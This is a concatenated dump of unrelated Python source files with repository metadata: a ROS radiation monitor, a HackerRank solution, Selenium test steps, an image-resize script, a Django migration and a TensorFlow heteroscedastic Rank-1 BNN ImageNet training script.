from std_msgs.msg import String
ws_lock = Lock()
dict_msgs = {}
from gazebo_radiation_plugins.msg import Simulated_Radiation_Msg
def callback_radiation_sensor_plugin_sensor_0(data):
global ws, ws_lock
rospy.loginfo('monitor has observed: ' + str(data))
dict = message_converter.convert_ros_message_to_dictionary(data)
dict['topic'] = '/radiation_sensor_plugin/sensor_0'
dict['time'] = rospy.get_time()
ws_lock.acquire()
while dict['time'] in dict_msgs:
dict['time'] += 0.01
ws.send(json.dumps(dict))
dict_msgs[dict['time']] = data
ws_lock.release()
rospy.loginfo('event propagated to oracle')
pub_dict = {
}
msg_dict = {
'/radiation_sensor_plugin/sensor_0' : "gazebo_radiation_plugins/Simulated_Radiation_Msg"
}
def monitor():
global pub_error, pub_verdict
with open(log, 'w') as log_file:
log_file.write('')
rospy.init_node('radiation_monitor_red', anonymous=True)
pub_error = rospy.Publisher(name = 'radiation_monitor_red/monitor_error', data_class = MonitorError, latch = True, queue_size = 1000)
pub_verdict = rospy.Publisher(name = 'radiation_monitor_red/monitor_verdict', data_class = String, latch = True, queue_size = 1000)
rospy.Subscriber('/radiation_sensor_plugin/sensor_0', Simulated_Radiation_Msg, callback_radiation_sensor_plugin_sensor_0)
rospy.loginfo('monitor started and ready')
def on_message(ws, message):
global error, log, actions
json_dict = json.loads(message)
if json_dict['verdict'] == 'true' or json_dict['verdict'] == 'currently_true' or json_dict['verdict'] == 'unknown' or (json_dict['verdict'] == 'currently_false' and actions[json_dict['topic']][1] > 1):
if json_dict['verdict'] == 'true' and not pub_dict:
rospy.loginfo('The monitor concluded the satisfaction of the property under analysis, and can be safely removed.')
ws.close()
exit(0)
else:
logging(json_dict)
topic = json_dict['topic']
rospy.loginfo('The event ' + message + ' is consistent and republished')
if topic in pub_dict:
pub_dict[topic].publish(dict_msgs[json_dict['time']])
del dict_msgs[json_dict['time']]
else:
logging(json_dict)
# if (json_dict['verdict'] == 'false' and actions[json_dict['topic']][1] >= 1) or (json_dict['verdict'] == 'currently_false' and actions[json_dict['topic']][1] == 1):
rospy.loginfo('The event ' + message + ' is inconsistent..')
error = MonitorError()
error.topic = json_dict['topic']
error.time = json_dict['time']
error.property = json_dict['spec']
error.content = str(dict_msgs[json_dict['time']])
pub_error.publish(error)
if json_dict['verdict'] == 'false' and not pub_dict:
rospy.loginfo('The monitor concluded the violation of the property under analysis, and can be safely removed.')
ws.close()
exit(0)
if actions[json_dict['topic']][0] != 'filter':
# if json_dict['verdict'] == 'currently_false':
# rospy.loginfo('The event ' + message + ' is consistent ')
topic = json_dict['topic']
if topic in pub_dict:
pub_dict[topic].publish(dict_msgs[json_dict['time']])
del dict_msgs[json_dict['time']]
error = True
pub_verdict.publish(json_dict['verdict'])
def on_error(ws, error):
rospy.loginfo(error)
def on_close(ws):
rospy.loginfo('### websocket closed ###')
def on_open(ws):
rospy.loginfo('### websocket is open ###')
def logging(json_dict):
try:
with open(log, 'a+') as log_file:
log_file.write(json.dumps(json_dict) + '\n')
rospy.loginfo('event logged')
except:
rospy.loginfo('Unable to log the event.')
def main(argv):
global log, actions, ws
log = '/media/angelo/WorkData/git/radiation_ws/src/monitor/log_radiation_red.txt'
actions = {
'/radiation_sensor_plugin/sensor_0' : ('log', 1)
}
monitor()
websocket.enableTrace(False)
ws = websocket.WebSocketApp(
'ws://127.0.0.1:8081',
on_message = on_message,
on_error = on_error,
on_close = on_close,
on_open = on_open)
ws.run_forever()
if __name__ == '__main__':
main(sys.argv)
| 37.803279
| 205
| 0.645924
|
4a18df85db89a74d3a14478fc1fd46600e185ad1
| 75
|
py
|
Python
|
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
from concurrent.futures import Future
print(Future)
print('Successful.')
| 12.5
| 37
| 0.786667
|
4a18df88f9eb8e6d5ea2048117a038ecb972baee
| 1,016
|
py
|
Python
|
Algorithms/Strings/hackerrank_in_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
Algorithms/Strings/hackerrank_in_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
Algorithms/Strings/hackerrank_in_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
q = int(input().strip())
for a0 in range(q):
s = input().strip()
start = s.find('h', 0)
if start == -1:
print('NO')
continue
start = s.find('a', start+1)
if start == -1:
print('NO')
continue
start = s.find('c', start+1)
if start == -1:
print('NO')
continue
start = s.find('k', start+1)
if start == -1:
print('NO')
continue
start = s.find('e', start+1)
if start == -1:
print('NO')
continue
start = s.find('r', start+1)
if start == -1:
print('NO')
continue
start = s.find('r', start+1)
if start == -1:
print('NO')
continue
start = s.find('a', start+1)
if start == -1:
print('NO')
continue
start = s.find('n', start+1)
if start == -1:
print('NO')
continue
start = s.find('k', start+1)
if start == -1:
print('NO')
continue
print('YES')
| 20.734694
| 32
| 0.458661
|
4a18df909a756ccdcbdef7a31b87f6742bf91c6f
| 868
|
py
|
Python
|
BDD_Formy_testing/src/features/steps/modal_page_steps.py
|
AntonioIonica/Automation_testing
|
6f7c94c55677b0958e6fada24058f1a00d2c0d0e
|
[
"MIT"
] | null | null | null |
BDD_Formy_testing/src/features/steps/modal_page_steps.py
|
AntonioIonica/Automation_testing
|
6f7c94c55677b0958e6fada24058f1a00d2c0d0e
|
[
"MIT"
] | null | null | null |
BDD_Formy_testing/src/features/steps/modal_page_steps.py
|
AntonioIonica/Automation_testing
|
6f7c94c55677b0958e6fada24058f1a00d2c0d0e
|
[
"MIT"
] | null | null | null |
import time
from behave import *
from selenium.webdriver.common.by import By
@when(u'I navigate to modal page')
def step_impl(context):
context.driver.find_element(By.XPATH, '/html/body/div/div/li[10]/a').click()
time.sleep(1.5)
@when(u'I click on "Open Modal"')
def step_impl(context):
context.driver.find_element(By.ID, 'modal-button').click()
time.sleep(1.5)
@when(u'I click on ok button')
def step_impl(context):
context.driver.find_element(By.ID, 'ok-button').click()
@then(u'The modal window closes')
def step_impl(context):
modal_title = context.driver.find_element(By.XPATH, '//*[@id="exampleModal"]/div/div')
if modal_title.is_displayed() is False:
assert True
else:
assert False
@when(u'I click on close button')
def step_impl(context):
context.driver.find_element(By.ID, 'close-button').click()
| 24.8
| 90
| 0.697005
|
4a18dfd4101442937cca25c0a1d52fdaad1af669
| 720
|
py
|
Python
|
useful_scripts/scaleToWidthxWidth.py
|
jessvb/3d_world_procedural_generation
|
44468f4267ccb378de90efb53d6c52a204cd6e25
|
[
"MIT"
] | 7
|
2019-01-29T21:20:01.000Z
|
2020-11-23T01:03:04.000Z
|
useful_scripts/scaleToWidthxWidth.py
|
jessvb/3d_world_procedural_generation
|
44468f4267ccb378de90efb53d6c52a204cd6e25
|
[
"MIT"
] | null | null | null |
useful_scripts/scaleToWidthxWidth.py
|
jessvb/3d_world_procedural_generation
|
44468f4267ccb378de90efb53d6c52a204cd6e25
|
[
"MIT"
] | 1
|
2021-07-12T10:43:29.000Z
|
2021-07-12T10:43:29.000Z
|
############################################################
###### Run this script within the source image folder ######
############################################################
import PIL
import glob
from PIL import Image
imgList = glob.glob('*.png')
fileOutputPath = 'C:/Users/jessv/Dropbox (MIT)/1st Year EECS/6.S198/6.S198 Final Project/Test PIL/ResizedImg/'
basewidth = 1024
for imgName in imgList:
img = Image.open(imgName)
wpercent = (basewidth / float(img.size[0]))
hsize = int((float(img.size[1]) * float(wpercent)))
img = img.resize((basewidth, hsize), PIL.Image.ANTIALIAS)
img.save(fileOutputPath + str(basewidth) + imgName)
print('done resizing ' + imgName)
print('done!')
| 30
| 110
| 0.569444
|
4a18e00d8bc3c6f27e943b7ff65831f134118697
| 918
|
py
|
Python
|
main/migrations/0004_auto_20190801_1128.py
|
NuTTeR/routersite-web
|
340595ccb129fd91233b847695c8d72c29d77e00
|
[
"MIT"
] | null | null | null |
main/migrations/0004_auto_20190801_1128.py
|
NuTTeR/routersite-web
|
340595ccb129fd91233b847695c8d72c29d77e00
|
[
"MIT"
] | 4
|
2021-04-08T21:55:02.000Z
|
2021-06-10T20:28:22.000Z
|
main/migrations/0004_auto_20190801_1128.py
|
NuTTeR/routersite-web
|
340595ccb129fd91233b847695c8d72c29d77e00
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.3 on 2019-08-01 11:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0003_routeinitauto_driver_limit'),
]
operations = [
migrations.AddField(
model_name='route',
name='load_time',
field=models.PositiveIntegerField(default=0, verbose_name='Время погрузки (в секундах)'),
preserve_default=False,
),
migrations.AlterField(
model_name='route',
name='reis_start',
field=models.PositiveIntegerField(verbose_name='Приезд на погрузку (в секундах с полуночи)'),
),
migrations.AlterField(
model_name='routeinitauto',
name='reis_start',
field=models.PositiveIntegerField(verbose_name='Время начала работы водителя (в секундах с полуночи)'),
),
]
| 30.6
| 115
| 0.617647
|
4a18e0830194616bcb147114d72c0a307257e565
| 22,984
|
py
|
Python
|
baselines/imagenet/het_rank1_bnn.py
|
dvdzhang/uncertainty-baselines
|
8ce0d7494e5cae0719c1b750da4b61564e536636
|
[
"Apache-2.0"
] | null | null | null |
baselines/imagenet/het_rank1_bnn.py
|
dvdzhang/uncertainty-baselines
|
8ce0d7494e5cae0719c1b750da4b61564e536636
|
[
"Apache-2.0"
] | null | null | null |
baselines/imagenet/het_rank1_bnn.py
|
dvdzhang/uncertainty-baselines
|
8ce0d7494e5cae0719c1b750da4b61564e536636
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rank-1 BNN ResNet-50 on ImageNet with an heteroscedastic output layer.
An heteroscedastic output layer [1] uses a multivariate Normal distributed
latent variable on the final hidden layer. The covariance matrix of this latent
variable, models the aleatoric uncertainty due to label noise.
A Rank-1 Bayesian neural net (Rank-1 BNN) [2] is an efficient and scalable
approach to variational BNNs that posits prior distributions on rank-1 factors
of the weights and optimizes global mixture variational posterior distributions.
The approaches are combined simply by using DenseRank1 layers from [2] to
construct the heteroscedastic layer.
References:
[1]: Mark Collier, Basil Mustafa, Efi Kokiopoulou, Rodolphe Jenatton and
Jesse Berent. Correlated Input-Dependent Label Noise in Large-Scale Image
Classification. In Proc. of the IEEE/CVF Conference on Computer Vision
and Pattern Recognition (CVPR), 2021, pp. 1551-1560.
https://arxiv.org/abs/2105.10305
[2]: Michael W. Dusenberry*, Ghassen Jerfel*, Yeming Wen, Yian Ma, Jasper
Snoek, Katherine Heller, Balaji Lakshminarayanan, Dustin Tran. Efficient
and Scalable Bayesian Neural Nets with Rank-1 Factors. In Proc. of
International Conference on Machine Learning (ICML) 2020.
https://arxiv.org/abs/2005.07186
"""
import os
import time
from absl import app
from absl import flags
from absl import logging
import robustness_metrics as rm
import tensorflow as tf
import tensorflow_datasets as tfds
import uncertainty_baselines as ub
import utils # local file import from baselines.imagenet
from tensorboard.plugins.hparams import api as hp
flags.DEFINE_integer('kl_annealing_epochs', 90,
'Number of epochs over which to anneal the KL term to 1.')
flags.DEFINE_string('alpha_initializer', 'trainable_normal',
'Initializer name for the alpha parameters.')
flags.DEFINE_string('gamma_initializer', 'trainable_normal',
'Initializer name for the gamma parameters.')
flags.DEFINE_string('alpha_regularizer', 'normal_kl_divergence',
'Regularizer name for the alpha parameters.')
flags.DEFINE_string('gamma_regularizer', 'normal_kl_divergence',
'Regularizer name for the gamma parameters.')
flags.DEFINE_boolean('use_additive_perturbation', False,
'Use additive perturbations instead of multiplicative.')
# General model flags
flags.DEFINE_integer('ensemble_size', 4, 'Size of ensemble.')
flags.DEFINE_integer('per_core_batch_size', 128, 'Batch size per TPU core/GPU.')
flags.DEFINE_float('random_sign_init', 0.75,
'Use random sign init for fast weights.')
flags.DEFINE_integer('seed', 0, 'Random seed.')
flags.DEFINE_float('base_learning_rate', 0.1,
'Base learning rate when train batch size is 256.')
flags.DEFINE_float('one_minus_momentum', 0.1, 'Optimizer momentum.')
flags.DEFINE_float('dropout_rate', 1e-3,
'Dropout rate. Only used if alpha/gamma initializers are, '
'e.g., trainable normal with a fixed stddev.')
flags.DEFINE_float('prior_stddev', 0.05,
'Prior stddev. Sort of like a prior on dropout rate, where '
'it encourages defaulting/shrinking to this value.')
flags.DEFINE_float('l2', 1e-4, 'L2 coefficient.')
flags.DEFINE_float('fast_weight_lr_multiplier', 1.0,
'fast weights lr multiplier.')
flags.DEFINE_string('data_dir', None, 'Path to training and testing data.')
flags.DEFINE_string('output_dir', '/tmp/imagenet',
'The directory where the model weights and '
'training/evaluation summaries are stored.')
flags.DEFINE_integer('train_epochs', 135, 'Number of training epochs.')
flags.DEFINE_integer('corruptions_interval', 135,
'Number of epochs between evaluating on the corrupted '
'test data. Use -1 to never evaluate.')
flags.DEFINE_integer('checkpoint_interval', 27,
'Number of epochs between saving checkpoints. Use -1 to '
'never save checkpoints.')
flags.DEFINE_string('alexnet_errors_path', None,
'Path to AlexNet corruption errors file.')
flags.DEFINE_integer('num_bins', 15, 'Number of bins for ECE computation.')
flags.DEFINE_bool('use_ensemble_bn', False, 'Whether to use ensemble bn.')
flags.DEFINE_integer('num_eval_samples', 1,
'Number of model predictions to sample per example at '
'eval time.')
# Accelerator flags.
flags.DEFINE_bool('use_gpu', False, 'Whether to run on GPU or otherwise TPU.')
flags.DEFINE_bool('use_bfloat16', False, 'Whether to use mixed precision.')
flags.DEFINE_integer('num_cores', 32, 'Number of TPU cores or number of GPUs.')
flags.DEFINE_string('tpu', None,
'Name of the TPU. Only used if use_gpu is False.')
# Heteroscedastic flags.
flags.DEFINE_integer('num_factors', 15,
'Num factors to approximate full rank covariance matrix.')
flags.DEFINE_float('temperature', 1.5,
'Temperature for heteroscedastic head.')
flags.DEFINE_integer('num_mc_samples', 5000,
'Num MC samples for heteroscedastic layer.')
FLAGS = flags.FLAGS
# Number of images in ImageNet-1k train dataset.
APPROX_IMAGENET_TRAIN_IMAGES = 1281167
# Number of images in eval dataset.
IMAGENET_VALIDATION_IMAGES = 50000
NUM_CLASSES = 1000
def main(argv):
del argv # unused arg
tf.random.set_seed(FLAGS.seed)
per_core_batch_size = FLAGS.per_core_batch_size // FLAGS.ensemble_size
batch_size = per_core_batch_size * FLAGS.num_cores
steps_per_epoch = APPROX_IMAGENET_TRAIN_IMAGES // batch_size
steps_per_eval = IMAGENET_VALIDATION_IMAGES // batch_size
logging.info('Saving checkpoints at %s', FLAGS.output_dir)
data_dir = FLAGS.data_dir
if FLAGS.use_gpu:
logging.info('Use GPU')
strategy = tf.distribute.MirroredStrategy()
else:
logging.info('Use TPU at %s',
FLAGS.tpu if FLAGS.tpu is not None else 'local')
resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu=FLAGS.tpu)
tf.config.experimental_connect_to_cluster(resolver)
tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.TPUStrategy(resolver)
train_builder = ub.datasets.ImageNetDataset(
split=tfds.Split.TRAIN,
use_bfloat16=FLAGS.use_bfloat16,
data_dir=data_dir)
train_dataset = train_builder.load(batch_size=batch_size, strategy=strategy)
test_builder = ub.datasets.ImageNetDataset(
split=tfds.Split.TEST, use_bfloat16=FLAGS.use_bfloat16, data_dir=data_dir)
clean_test_dataset = test_builder.load(
batch_size=batch_size, strategy=strategy)
test_datasets = {
'clean': clean_test_dataset
}
if FLAGS.corruptions_interval > 0:
corruption_types, max_intensity = utils.load_corrupted_test_info()
for name in corruption_types:
for intensity in range(1, max_intensity + 1):
dataset_name = '{0}_{1}'.format(name, intensity)
dataset = utils.load_corrupted_test_dataset(
batch_size=batch_size,
corruption_name=name,
corruption_intensity=intensity,
use_bfloat16=FLAGS.use_bfloat16)
test_datasets[dataset_name] = (
strategy.experimental_distribute_dataset(dataset))
if FLAGS.use_bfloat16:
policy = tf.keras.mixed_precision.experimental.Policy('mixed_bfloat16')
tf.keras.mixed_precision.experimental.set_policy(policy)
summary_writer = tf.summary.create_file_writer(
os.path.join(FLAGS.output_dir, 'summaries'))
with strategy.scope():
logging.info('Building Keras ResNet-50 model')
model = ub.models.resnet50_het_rank1(
input_shape=(224, 224, 3),
num_classes=NUM_CLASSES,
alpha_initializer=FLAGS.alpha_initializer,
gamma_initializer=FLAGS.gamma_initializer,
alpha_regularizer=FLAGS.alpha_regularizer,
gamma_regularizer=FLAGS.gamma_regularizer,
use_additive_perturbation=FLAGS.use_additive_perturbation,
ensemble_size=FLAGS.ensemble_size,
random_sign_init=FLAGS.random_sign_init,
dropout_rate=FLAGS.dropout_rate,
prior_stddev=FLAGS.prior_stddev,
use_tpu=not FLAGS.use_gpu,
use_ensemble_bn=FLAGS.use_ensemble_bn,
num_factors=FLAGS.num_factors,
temperature=FLAGS.temperature,
num_mc_samples=FLAGS.num_mc_samples)
logging.info('Model input shape: %s', model.input_shape)
logging.info('Model output shape: %s', model.output_shape)
logging.info('Model number of weights: %s', model.count_params())
# Scale learning rate and decay epochs by vanilla settings.
base_lr = FLAGS.base_learning_rate * batch_size / 256
decay_epochs = [
(FLAGS.train_epochs * 30) // 90,
(FLAGS.train_epochs * 60) // 90,
(FLAGS.train_epochs * 80) // 90,
]
learning_rate = ub.schedules.WarmUpPiecewiseConstantSchedule(
steps_per_epoch=steps_per_epoch,
base_learning_rate=base_lr,
decay_ratio=0.1,
decay_epochs=decay_epochs,
warmup_epochs=5)
optimizer = tf.keras.optimizers.SGD(learning_rate=learning_rate,
momentum=1.0 - FLAGS.one_minus_momentum,
nesterov=True)
metrics = {
'train/negative_log_likelihood': tf.keras.metrics.Mean(),
'train/kl': tf.keras.metrics.Mean(),
'train/kl_scale': tf.keras.metrics.Mean(),
'train/elbo': tf.keras.metrics.Mean(),
'train/loss': tf.keras.metrics.Mean(),
'train/accuracy': tf.keras.metrics.SparseCategoricalAccuracy(),
'train/ece': rm.metrics.ExpectedCalibrationError(
num_bins=FLAGS.num_bins),
'train/diversity': rm.metrics.AveragePairwiseDiversity(),
'test/negative_log_likelihood': tf.keras.metrics.Mean(),
'test/kl': tf.keras.metrics.Mean(),
'test/elbo': tf.keras.metrics.Mean(),
'test/accuracy': tf.keras.metrics.SparseCategoricalAccuracy(),
'test/ece': rm.metrics.ExpectedCalibrationError(
num_bins=FLAGS.num_bins),
'test/diversity': rm.metrics.AveragePairwiseDiversity(),
'test/member_accuracy_mean': (
tf.keras.metrics.SparseCategoricalAccuracy()),
'test/member_ece_mean': rm.metrics.ExpectedCalibrationError(
num_bins=FLAGS.num_bins),
}
if FLAGS.corruptions_interval > 0:
corrupt_metrics = {}
for intensity in range(1, max_intensity + 1):
for corruption in corruption_types:
dataset_name = '{0}_{1}'.format(corruption, intensity)
corrupt_metrics['test/nll_{}'.format(dataset_name)] = (
tf.keras.metrics.Mean())
corrupt_metrics['test/kl_{}'.format(dataset_name)] = (
tf.keras.metrics.Mean())
corrupt_metrics['test/elbo_{}'.format(dataset_name)] = (
tf.keras.metrics.Mean())
corrupt_metrics['test/accuracy_{}'.format(dataset_name)] = (
tf.keras.metrics.SparseCategoricalAccuracy())
corrupt_metrics['test/ece_{}'.format(dataset_name)] = (
rm.metrics.ExpectedCalibrationError(num_bins=FLAGS.num_bins))
if FLAGS.ensemble_size > 1:
for i in range(FLAGS.ensemble_size):
metrics['test/nll_member_{}'.format(i)] = tf.keras.metrics.Mean()
metrics['test/accuracy_member_{}'.format(i)] = (
tf.keras.metrics.SparseCategoricalAccuracy())
logging.info('Finished building Keras ResNet-50 model')
checkpoint = tf.train.Checkpoint(model=model, optimizer=optimizer)
latest_checkpoint = tf.train.latest_checkpoint(FLAGS.output_dir)
initial_epoch = 0
if latest_checkpoint:
# checkpoint.restore must be within a strategy.scope() so that optimizer
# slot variables are mirrored.
checkpoint.restore(latest_checkpoint)
logging.info('Loaded checkpoint %s', latest_checkpoint)
initial_epoch = optimizer.iterations.numpy() // steps_per_epoch
def compute_l2_loss(model):
filtered_variables = []
for var in model.trainable_variables:
# Apply l2 on the BN parameters and bias terms. This
# excludes only fast weight approximate posterior/prior parameters,
# but pay caution to their naming scheme.
if ('kernel' in var.name or
'batch_norm' in var.name or
'bias' in var.name):
filtered_variables.append(tf.reshape(var, (-1,)))
l2_loss = FLAGS.l2 * 2 * tf.nn.l2_loss(
tf.concat(filtered_variables, axis=0))
return l2_loss
@tf.function
def train_step(iterator):
"""Training StepFn."""
def step_fn(inputs):
"""Per-Replica StepFn."""
images = inputs['features']
labels = inputs['labels']
if FLAGS.ensemble_size > 1:
images = tf.tile(images, [FLAGS.ensemble_size, 1, 1, 1])
labels = tf.tile(labels, [FLAGS.ensemble_size])
with tf.GradientTape() as tape:
logits = model(images, training=True)
if FLAGS.use_bfloat16:
logits = tf.cast(logits, tf.float32)
probs = tf.nn.softmax(logits)
if FLAGS.ensemble_size > 1:
per_probs = tf.reshape(
probs, tf.concat([[FLAGS.ensemble_size, -1], probs.shape[1:]], 0))
metrics['train/diversity'].add_batch(per_probs)
negative_log_likelihood = tf.reduce_mean(
tf.keras.losses.sparse_categorical_crossentropy(labels,
logits,
from_logits=True))
l2_loss = compute_l2_loss(model)
kl = sum(model.losses) / APPROX_IMAGENET_TRAIN_IMAGES
kl_scale = tf.cast(optimizer.iterations + 1, kl.dtype)
kl_scale /= steps_per_epoch * FLAGS.kl_annealing_epochs
kl_scale = tf.minimum(1., kl_scale)
kl_loss = kl_scale * kl
# Scale the loss given the TPUStrategy will reduce sum all gradients.
loss = negative_log_likelihood + l2_loss + kl_loss
scaled_loss = loss / strategy.num_replicas_in_sync
elbo = -(negative_log_likelihood + l2_loss + kl)
grads = tape.gradient(scaled_loss, model.trainable_variables)
# Separate learning rate implementation.
if FLAGS.fast_weight_lr_multiplier != 1.0:
grads_and_vars = []
for grad, var in zip(grads, model.trainable_variables):
# Apply different learning rate on the fast weights. This excludes BN
# and slow weights, but pay caution to the naming scheme.
if ('batch_norm' not in var.name and 'kernel' not in var.name):
grads_and_vars.append((grad * FLAGS.fast_weight_lr_multiplier,
var))
else:
grads_and_vars.append((grad, var))
optimizer.apply_gradients(grads_and_vars)
else:
optimizer.apply_gradients(zip(grads, model.trainable_variables))
metrics['train/negative_log_likelihood'].update_state(
negative_log_likelihood)
metrics['train/kl'].update_state(kl)
metrics['train/kl_scale'].update_state(kl_scale)
metrics['train/elbo'].update_state(elbo)
metrics['train/loss'].update_state(loss)
metrics['train/accuracy'].update_state(labels, logits)
metrics['train/ece'].add_batch(probs, label=labels)
for _ in tf.range(tf.cast(steps_per_epoch, tf.int32)):
strategy.run(step_fn, args=(next(iterator),))
@tf.function
def test_step(iterator, dataset_name):
"""Evaluation StepFn."""
def step_fn(inputs):
"""Per-Replica StepFn."""
images = inputs['features']
labels = inputs['labels']
if FLAGS.ensemble_size > 1:
images = tf.tile(images, [FLAGS.ensemble_size, 1, 1, 1])
logits = tf.reshape(
[model(images, training=False)
for _ in range(FLAGS.num_eval_samples)],
[FLAGS.num_eval_samples, FLAGS.ensemble_size, -1, NUM_CLASSES])
if FLAGS.use_bfloat16:
logits = tf.cast(logits, tf.float32)
all_probs = tf.nn.softmax(logits)
probs = tf.math.reduce_mean(all_probs, axis=[0, 1]) # marginalize
# Negative log marginal likelihood computed in a numerically-stable way.
labels_broadcasted = tf.broadcast_to(
labels,
[FLAGS.num_eval_samples, FLAGS.ensemble_size, tf.shape(labels)[0]])
log_likelihoods = -tf.keras.losses.sparse_categorical_crossentropy(
labels_broadcasted, logits, from_logits=True)
negative_log_likelihood = tf.reduce_mean(
-tf.reduce_logsumexp(log_likelihoods, axis=[0, 1]) +
tf.math.log(float(FLAGS.num_eval_samples * FLAGS.ensemble_size)))
l2_loss = compute_l2_loss(model)
kl = sum(model.losses) / IMAGENET_VALIDATION_IMAGES
elbo = -(negative_log_likelihood + l2_loss + kl)
if dataset_name == 'clean':
if FLAGS.ensemble_size > 1:
per_probs = tf.reduce_mean(all_probs, axis=0) # marginalize samples
metrics['test/diversity'].add_batch(per_probs)
for i in range(FLAGS.ensemble_size):
member_probs = per_probs[i]
member_loss = tf.keras.losses.sparse_categorical_crossentropy(
labels, member_probs)
metrics['test/nll_member_{}'.format(i)].update_state(member_loss)
metrics['test/accuracy_member_{}'.format(i)].update_state(
labels, member_probs)
metrics['test/member_accuracy_mean'].update_state(
labels, member_probs)
metrics['test/member_ece_mean'].add_batch(
member_probs, label=labels)
metrics['test/negative_log_likelihood'].update_state(
negative_log_likelihood)
metrics['test/kl'].update_state(kl)
metrics['test/elbo'].update_state(elbo)
metrics['test/accuracy'].update_state(labels, probs)
metrics['test/ece'].add_batch(probs, label=labels)
else:
corrupt_metrics['test/nll_{}'.format(dataset_name)].update_state(
negative_log_likelihood)
corrupt_metrics['test/kl_{}'.format(dataset_name)].update_state(kl)
corrupt_metrics['test/elbo_{}'.format(dataset_name)].update_state(elbo)
corrupt_metrics['test/accuracy_{}'.format(dataset_name)].update_state(
labels, probs)
corrupt_metrics['test/ece_{}'.format(dataset_name)].add_batch(
probs, label=labels)
for _ in tf.range(tf.cast(steps_per_eval, tf.int32)):
strategy.run(step_fn, args=(next(iterator),))
train_iterator = iter(train_dataset)
start_time = time.time()
for epoch in range(initial_epoch, FLAGS.train_epochs):
logging.info('Starting to run epoch: %s', epoch)
train_step(train_iterator)
current_step = (epoch + 1) * steps_per_epoch
max_steps = steps_per_epoch * FLAGS.train_epochs
time_elapsed = time.time() - start_time
steps_per_sec = float(current_step) / time_elapsed
eta_seconds = (max_steps - current_step) / steps_per_sec
message = ('{:.1%} completion: epoch {:d}/{:d}. {:.1f} steps/s. '
'ETA: {:.0f} min. Time elapsed: {:.0f} min'.format(
current_step / max_steps,
epoch + 1,
FLAGS.train_epochs,
steps_per_sec,
eta_seconds / 60,
time_elapsed / 60))
logging.info(message)
datasets_to_evaluate = {'clean': test_datasets['clean']}
if (FLAGS.corruptions_interval > 0 and
(epoch + 1) % FLAGS.corruptions_interval == 0):
datasets_to_evaluate = test_datasets
for dataset_name, test_dataset in datasets_to_evaluate.items():
logging.info('Testing on dataset %s', dataset_name)
test_iterator = iter(test_dataset)
logging.info('Starting to run eval at epoch: %s', epoch)
test_step(test_iterator, dataset_name)
logging.info('Done with testing on %s', dataset_name)
corrupt_results = {}
if (FLAGS.corruptions_interval > 0 and
(epoch + 1) % FLAGS.corruptions_interval == 0):
corrupt_results = utils.aggregate_corrupt_metrics(
corrupt_metrics, corruption_types, max_intensity,
FLAGS.alexnet_errors_path)
logging.info('Train Loss: %.4f, Accuracy: %.2f%%',
metrics['train/loss'].result(),
metrics['train/accuracy'].result() * 100)
logging.info('Test NLL: %.4f, Accuracy: %.2f%%',
metrics['test/negative_log_likelihood'].result(),
metrics['test/accuracy'].result() * 100)
for i in range(FLAGS.ensemble_size):
logging.info('Member %d Test Loss: %.4f, Accuracy: %.2f%%',
i, metrics['test/nll_member_{}'.format(i)].result(),
metrics['test/accuracy_member_{}'.format(i)].result() * 100)
total_results = {name: metric.result() for name, metric in metrics.items()}
total_results.update(corrupt_results)
# Results from Robustness Metrics themselves return a dict, so flatten them.
total_results = utils.flatten_dictionary(total_results)
with summary_writer.as_default():
for name, result in total_results.items():
tf.summary.scalar(name, result, step=epoch + 1)
for metric in metrics.values():
metric.reset_states()
if (FLAGS.checkpoint_interval > 0 and
(epoch + 1) % FLAGS.checkpoint_interval == 0):
checkpoint_name = checkpoint.save(os.path.join(
FLAGS.output_dir, 'checkpoint'))
logging.info('Saved checkpoint to %s', checkpoint_name)
final_checkpoint_name = checkpoint.save(
os.path.join(FLAGS.output_dir, 'checkpoint'))
logging.info('Saved last checkpoint to %s', final_checkpoint_name)
final_save_name = os.path.join(FLAGS.output_dir, 'model')
model.save(final_save_name)
logging.info('Saved model to %s', final_save_name)
with summary_writer.as_default():
hp.hparams({
'base_learning_rate': FLAGS.base_learning_rate,
'one_minus_momentum': FLAGS.one_minus_momentum,
'l2': FLAGS.l2,
'fast_weight_lr_multiplier': FLAGS.fast_weight_lr_multiplier,
'num_eval_samples': FLAGS.num_eval_samples,
})
if __name__ == '__main__':
app.run(main)
| 44.629126
| 80
| 0.674513
|
4a18e09f4248a6edd27c80f43be471fdf084cac6
| 906
|
py
|
Python
|
imperial/imperial/core/gui/filterReturn.py
|
jorgesaw/imperial
|
ed4d33d1bcc71eb5f497b3cfed52d1fed48b0a7a
|
[
"Unlicense"
] | null | null | null |
imperial/imperial/core/gui/filterReturn.py
|
jorgesaw/imperial
|
ed4d33d1bcc71eb5f497b3cfed52d1fed48b0a7a
|
[
"Unlicense"
] | null | null | null |
imperial/imperial/core/gui/filterReturn.py
|
jorgesaw/imperial
|
